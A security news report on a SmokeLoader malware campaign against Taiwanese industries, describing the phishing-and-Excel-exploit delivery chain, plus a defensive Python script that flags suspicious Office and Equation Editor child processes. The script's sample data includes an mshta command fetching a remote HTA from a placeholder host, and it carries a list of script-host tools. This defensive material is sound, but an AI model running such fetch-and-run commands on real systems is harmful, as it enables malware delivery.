Latest intelligence shows that Taiwan’s manufacturing, healthcare, and information technology industries are facing a new wave of attacks from the SmokeLoader malware.
According to a report by Fortinet FortiGuard Labs, SmokeLoader is known for its versatility and advanced anti-detection techniques, and its modular design lets it carry out a variety of attacks. Although SmokeLoader is mainly used as a downloader to deliver other malicious programs, in this campaign it carries out the attack itself by fetching plug-in modules from its command and control server.
SmokeLoader first appeared on hacker forums in 2011 and was primarily used to execute secondary malicious payloads. It has the ability to download additional modules that can be used to steal data, launch distributed denial of service (DDoS) attacks, and mine cryptocurrency.
In-depth analysis by security researchers revealed that SmokeLoader can detect analysis environments, generate fake network traffic, and obfuscate its code to evade detection and hinder analysis. The developers of this malware family continue to introduce new features and more advanced obfuscation techniques, making it more capable and harder to analyze.
At the end of May this year, “Operation Endgame” led by Europol destroyed the infrastructure of multiple malware families, including IcedID, SystemBC, PikaBot, SmokeLoader, Bumblebee and TrickBot, resulting in a significant reduction in SmokeLoader activity.
The operation took down approximately 1,000 command and control domains associated with SmokeLoader and remotely removed the malware from more than 50,000 infected systems. However, because many cracked versions circulate on the Internet, hacker groups have been able to keep using this malware to distribute malicious payloads by standing up new command and control infrastructure.
FortiGuard Labs found that the latest attack chain begins with a phishing email carrying a Microsoft Excel attachment. When the victim opens the file, it exploits old security vulnerabilities (CVE-2017-0199 and CVE-2017-11882) to deploy the Ande Loader malware, which in turn delivers SmokeLoader.
SmokeLoader consists of two main components: a stager and the main module. The stager is responsible for decrypting, decompressing, and injecting the main module into the explorer.exe process; the main module is responsible for establishing persistence, communicating with the command and control infrastructure, and executing commands.
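Defensive triage of process-creation telemetry for the delivery chain described above, as an added example (not code from the Fortinet report or this article): it flags Excel launching a script host (the pattern commonly associated with CVE-2017-0199) and any child process of the Equation Editor, EQNEDT32.EXE, the component patched by CVE-2017-11882. The CVE-to-process mappings are general knowledge about those vulnerabilities; the hostnames, paths and log events are constructed.

```python
"""Triage process-creation events for the Excel-attachment delivery chain
(CVE-2017-0199 / CVE-2017-11882 leading to a loader). Sample data is constructed."""
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Office applications rarely have a legitimate reason to launch these.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe",
                       "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
# Equation Editor (patched by CVE-2017-11882) should never spawn a child at all.
EQUATION_EDITOR = "eqnedt32.exe"


@dataclass
class ProcEvent:
    host: str
    parent_image: str   # full path of the parent process image
    image: str          # full path of the newly created process image
    cmdline: str


def _basename(path: str) -> str:
    """Lower-cased file name, tolerant of either slash style."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev: ProcEvent) -> Optional[str]:
    """Return a detection label for one event, or None if it looks benign."""
    parent, child = _basename(ev.parent_image), _basename(ev.image)
    if parent == EQUATION_EDITOR:
        return "equation-editor-spawned-process"   # CVE-2017-11882 pattern
    if parent in OFFICE_PARENTS and child in SUSPICIOUS_CHILDREN:
        return "office-spawned-script-host"        # CVE-2017-0199 / macro pattern
    return None


def triage(events: List[ProcEvent]) -> List[Tuple[str, str, str]]:
    """Keep only matching events as (host, label, cmdline) for an analyst."""
    return [(ev.host, label, ev.cmdline)
            for ev in events if (label := classify(ev)) is not None]


# Constructed sample telemetry: two benign events, two matching the chain.
SAMPLE_EVENTS = [
    ProcEvent("ws01", r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
              r"C:\Windows\splwow64.exe", "splwow64.exe 12288"),
    ProcEvent("ws01", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\notepad.exe", "notepad.exe"),
    ProcEvent("ws02", r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
              r"C:\Windows\System32\mshta.exe", "mshta.exe http://example.invalid/x.hta"),
    ProcEvent("ws03", r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
              r"C:\Windows\System32\cmd.exe", "cmd.exe /c placeholder"),
]
```

Running `triage(SAMPLE_EVENTS)` returns the two suspicious events from ws02 and ws03 and drops the benign print-helper and explorer.exe activity.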
This malware supports multiple plug-in modules and can steal sensitive information such as login credentials, FTP passwords, email addresses, and cookies from software such as web browsers, Outlook, Thunderbird, FileZilla, and WinSCP.
In this campaign, SmokeLoader carries out the attack through its plug-in modules rather than downloading a complete final-stage payload. This choice not only highlights SmokeLoader's flexibility, but also reminds security analysts that they must remain highly vigilant even when facing well-known malware.
Source: Information Security News, December 03, 2024
Transcribed from: TheHackerNews